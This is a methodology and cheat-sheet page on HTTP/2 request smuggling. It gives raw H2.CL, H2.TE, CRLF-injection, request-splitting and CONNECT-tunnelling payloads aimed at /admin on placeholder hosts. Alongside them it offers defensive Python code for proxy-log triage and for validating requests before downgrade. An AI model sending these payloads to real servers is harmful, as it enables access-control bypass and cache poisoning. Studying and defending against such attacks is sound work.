What is HTTP/2 Request Smuggling
A web vulnerability in which a front-end server and a back-end server parse the same HTTP/2 request differently, letting an attacker interfere with how requests are processed. It exploits differences in how headers such as Content-Length and Transfer-Encoding are interpreted once the request is forwarded, and can lead to unauthorized actions, data leakage, or bypasses of security controls.
Methodology
# IMPORTANT SETTINGS
- Turn off automatic Content-Length updating in the tool that sends the request (in Burp Repeater this is the "Update Content-Length" option). Otherwise the tool silently corrects the header and the deliberately inconsistent framing the test depends on is lost.
- Important: \r and \n are bytes. Each one counts toward Content-Length and toward chunk sizes, so include them whenever you compute lengths for headers or payloads.
---------------------------------------------------------------------------------
# HTTP/2 Downgrading
HTTP/2 downgrading is when the front-end accepts HTTP/2 from the client but rewrites each request as HTTP/1.1 before forwarding it to the back-end. HTTP/2 frames carry their own length, so the front-end may ignore a Content-Length or Transfer-Encoding header in the request, while the back-end honours that header once the request has been re-serialized. That disagreement is the basis of HTTP desynchronization attacks.
- H2.CL (Content-Length): the front-end uses the HTTP/2 frame length, the back-end trusts the forwarded Content-Length.
- H2.TE (Transfer-Encoding): the front-end uses the HTTP/2 frame length, the back-end honours Transfer-Encoding: chunked.
---------------------------------------------------------------------------------
# CRLF
- CRLF stands for Carriage Return (\r) and Line Feed (\n). The pair terminates each line in HTTP/1 headers.
- HTTP/2 is a binary protocol and does not use CRLF, so a front-end that copies a header value containing \r or \n into an HTTP/1.1 request without validating it turns the injected characters into new header lines or a new request. Understanding CRLF handling is critical for:
  - Header injection
  - Request splitting attacks
  - Response smuggling
- Always validate user input and reject or strip CRLF sequences before they reach a header value.
---------------------------------------------------------------------------------
# Request Tunneling
Request tunneling abuses the way an intermediary (a proxy or front-end) forwards traffic in order to bypass security controls: one request is embedded inside another, so the back-end receives a request the front-end never inspected.
- Key techniques:
  - Misuse of `CONNECT` requests to obtain unrestricted forwarding through the proxy.
  - Combining HTTP methods such as `POST` and `GET` in one exchange to bypass filtering.
- Example scenario:
  1. Use `CONNECT` to open an encrypted tunnel through the proxy.
  2. Send crafted HTTP requests through the tunnel; firewalls or IDS that inspect only the outer request never see them.
- Mitigation tips:
  - Validate and restrict the allowed HTTP methods.
  - Monitor proxy logs for unusual traffic patterns (for example, `CONNECT` requests to unexpected targets).
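The two mitigation tips above, worked as code. This is an added example and not part of the original notes or of any proxy product: it scans a constructed key=value proxy log (the field names `client`, `method`, `target`, `status` and `reqbody`, and the `CONNECT_ALLOWLIST` policy, are assumptions made for the example) and reports lines where the method is outside the allowed set, `CONNECT` targets an unapproved host:port, the request target carries a raw or percent-encoded CR/LF, or a body-less method arrived with a body.

```python
"""Proxy-log triage for the request-tunneling signs discussed above.
Added example with a constructed key=value log format; not from any proxy vendor."""
import re
from typing import Dict, List
from urllib.parse import unquote

ALLOWED_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "CONNECT"}
BODYLESS_METHODS = {"GET", "HEAD"}
# Policy value assumed for the example: CONNECT may only open tunnels to these host:port pairs
CONNECT_ALLOWLIST = {"example.com:443"}
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
CRLF_RE = re.compile(r"[\r\n]")

# Constructed sample log lines (timestamp followed by key=value fields)
SAMPLE_LOG = """\
2024-05-01T10:00:00Z client=10.0.0.5 method=CONNECT target=example.com:443 status=200 reqbody=0
2024-05-01T10:00:01Z client=10.0.0.5 method=CONNECT target=10.0.0.9:8080 status=200 reqbody=0
2024-05-01T10:00:02Z client=10.0.0.7 method=GET target=/search?q=x%0d%0aFoo:bar status=200 reqbody=0
2024-05-01T10:00:03Z client=10.0.0.7 method=PROPFIND target=/ status=405 reqbody=0
2024-05-01T10:00:04Z client=10.0.0.5 method=GET target=/ status=200 reqbody=57
2024-05-01T10:00:05Z client=10.0.0.8 method=POST target=/login status=302 reqbody=41
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split one log line into its timestamp and key=value fields."""
    ts, _, rest = line.partition(" ")
    fields = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
    fields["ts"] = ts
    return fields


def inspect(entry: Dict[str, str]) -> List[str]:
    """Return the reasons one log entry looks like tunneling or method abuse."""
    reasons: List[str] = []
    method = entry.get("method", "")
    target = entry.get("target", "")
    if method not in ALLOWED_METHODS:
        reasons.append(f"method {method} not allowed")
    if method == "CONNECT" and target not in CONNECT_ALLOWLIST:
        reasons.append(f"CONNECT to unapproved target {target}")
    # Decode %0d/%0a so percent-encoded line breaks are caught as well as raw ones
    if CRLF_RE.search(unquote(target)):
        reasons.append("CR/LF (possibly percent-encoded) in request target")
    if method in BODYLESS_METHODS and int(entry.get("reqbody", "0")) > 0:
        reasons.append(f"{method} request carried a {entry['reqbody']}-byte body")
    return reasons


def scan(log_text: str = SAMPLE_LOG) -> List[Dict]:
    """Return one finding per suspicious line, with timestamp, client and reasons."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        reasons = inspect(entry)
        if reasons:
            findings.append({"ts": entry["ts"], "client": entry.get("client"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan():
        print(finding["ts"], finding["client"], "; ".join(finding["reasons"]))
```

Run against a real proxy log, the parser is the only part that needs adapting; the rules operate on the method, target and body size, which every access-log format records in some form.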
Usage
- Leaking internal headers (headers the front-end adds to forwarded requests)
- Bypassing front-end restrictions (requesting a resource the front-end blocks)
- Web cache poisoning (changing the path a cached response is stored under)
Payloads
# H2.CL
The front-end forwards the whole HTTP/2 body; the back-end trusts content-length: 0 and treats the GET /admin that follows as the start of the next request.

```http
POST /target HTTP/2
Host: example.com
content-length: 0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10

x=1GET / H
```
----------------------------------------------------------------------------------
# H2.TE
The front-end ignores Transfer-Encoding and forwards everything; the back-end reads the chunked body, sees the terminating 0 chunk, and treats the remaining bytes as a new request.

```http
POST /example HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: bar
```
----------------------------------------------------------------------------------
# CRLF Injection
The \n inside the Foo value is harmless in HTTP/2, but once the front-end writes the header into an HTTP/1.1 request it becomes a line break, so the back-end sees a separate Transfer-Encoding: chunked header.

```http
POST /example HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Foo: bar\nTransfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: bar
```
----------------------------------------------------------------------------------
# HTTP/2 Request Splitting
Here the injected \r\n\r\n ends the header block of the downgraded request, so everything after it is parsed by the back-end as a second request.

```http
POST /example HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Foo: bar\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com
```
----------------------------------------------------------------------------------
# HTTP Request Tunneling
```http
:method: CONNECT
:scheme: https
:path: /target
:authority: example.com
content-length: 13

0
CONNECT /admin HTTP/2
:authority: example.com
```
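The checks a front-end should run on an HTTP/2 request before rewriting it as HTTP/1.1, so that none of the payloads above survive the downgrade. This is an added example and not the page's own code or any server's implementation: the function names and the `SAMPLES` table are constructions for the example, with the page's payloads re-expressed as HTTP/2 header lists (names lowercased, as they are on the wire). Each rule names the RFC 9113 requirement it enforces, and the serializer derives Content-Length from the DATA bytes actually received rather than copying the client's header.

```python
"""Front-end checks that make a downgraded HTTP/2 request unambiguous.
Added example; not taken from any project. Function and sample names are constructed."""
import re
from typing import List, Tuple

Header = Tuple[str, str]

# Connection-specific fields have no meaning in HTTP/2 and must not be forwarded (RFC 9113 s8.2.2)
CONNECTION_SPECIFIC = {"connection", "keep-alive", "proxy-connection", "transfer-encoding", "upgrade"}
PSEUDO = {":method", ":scheme", ":authority", ":path"}
NAME_RE = re.compile(r"^[a-z0-9!#$%&'*+.^_`|~-]+$")  # lowercase token, as HTTP/2 requires
CTL_RE = re.compile(r"[\x00\r\n]")                   # bytes that become line breaks after downgrade


def check_h2_request(headers: List[Header], body: bytes) -> List[str]:
    """Return every reason the request must be rejected; an empty list means it is safe to downgrade."""
    problems: List[str] = []
    seen_pseudo = set()
    for name, value in headers:
        if name.startswith(":"):
            if name not in PSEUDO:
                problems.append(f"unknown pseudo-header {name}")
            elif name in seen_pseudo:
                problems.append(f"duplicate pseudo-header {name}")
            seen_pseudo.add(name)
            if name == ":path" and value == "":
                problems.append(":path must not be empty")
        elif not NAME_RE.match(name):
            problems.append(f"invalid or non-lowercase header name {name!r}")
        if CTL_RE.search(value) or value != value.strip(" \t"):
            problems.append(f"control characters or whitespace padding in {name}")
        if name in CONNECTION_SPECIFIC:
            problems.append(f"connection-specific header {name} not allowed in HTTP/2")

    # The only trustworthy length is the number of DATA bytes actually received (RFC 9113 s8.1.1)
    for v in (v for n, v in headers if n == "content-length"):
        if not v.isdigit():
            problems.append(f"non-numeric content-length {v!r}")
        elif int(v) != len(body):
            problems.append(f"content-length {v} != DATA length {len(body)}")

    method = next((v for n, v in headers if n == ":method"), None)
    if method == "CONNECT":
        if seen_pseudo & {":scheme", ":path"}:
            problems.append(":scheme and :path must be omitted on CONNECT (RFC 9113 s8.5)")
        if ":authority" not in seen_pseudo:
            problems.append("CONNECT requires :authority")
    else:
        problems += [f"missing pseudo-header {p}" for p in (":method", ":scheme", ":path") if p not in seen_pseudo]
    return problems


def downgrade_to_http1(headers: List[Header], body: bytes) -> bytes:
    """Serialize to HTTP/1.1 only after the checks pass; the length always comes from the body."""
    problems = check_h2_request(headers, body)
    if problems:
        raise ValueError("; ".join(problems))
    pseudo = {n: v for n, v in headers if n.startswith(":")}
    target = pseudo[":authority"] if pseudo[":method"] == "CONNECT" else pseudo[":path"]
    lines = [f"{pseudo[':method']} {target} HTTP/1.1"]
    if ":authority" in pseudo:
        lines.append(f"Host: {pseudo[':authority']}")
    lines += [f"{n}: {v}" for n, v in headers if not n.startswith(":") and n != "content-length"]
    lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def _req(path: str, *extra: Header, method: str = "POST") -> List[Header]:
    """Build a header list for the constructed samples below."""
    return [(":method", method), (":scheme", "https"), (":authority", "vulnerable-website.com"),
            (":path", path), *extra]


SMUGGLED = (b"GET /admin HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
            b"Content-Length: 10\r\n\r\nx=1GET / H")
FORM = ("content-type", "application/x-www-form-urlencoded")

# The page's payloads re-expressed as HTTP/2 header lists plus DATA bytes (constructed inputs)
SAMPLES = {
    "h2.cl": (_req("/target", ("content-length", "0")), SMUGGLED),
    "h2.te": (_req("/example", FORM, ("transfer-encoding", "chunked")), b"0\r\n\r\n" + SMUGGLED),
    "crlf": (_req("/example", FORM, ("foo", "bar\nTransfer-Encoding: chunked")), b"0\r\n\r\n" + SMUGGLED),
    "split": (_req("/example", FORM, ("foo", "bar\r\n\r\nGET /admin HTTP/1.1\r\nHost: vulnerable-website.com")), b""),
    "connect": ([(":method", "CONNECT"), (":scheme", "https"), (":path", "/target"),
                 (":authority", "example.com"), ("content-length", "13")], b"0\r\n\r\n"),
    "clean": (_req("/target", FORM), b"x=1"),
}


def triage(samples=SAMPLES) -> dict:
    """Map each sample name to the reasons it is rejected ([] means it would be downgraded)."""
    return {name: check_h2_request(h, b) for name, (h, b) in samples.items()}


if __name__ == "__main__":
    for name, problems in triage().items():
        print(f"{name:8s} -> {problems or 'OK'}")
    print(downgrade_to_http1(*SAMPLES["clean"]).decode("latin-1"))
```

Each payload is stopped by a different rule: H2.CL by the length mismatch, H2.TE by the connection-specific header, the CRLF and splitting variants by the control-character check, and the tunnelling payload by the CONNECT pseudo-header rule (and, as constructed, by its length mismatch). Only the clean sample reaches the serializer, which emits a single well-framed HTTP/1.1 request.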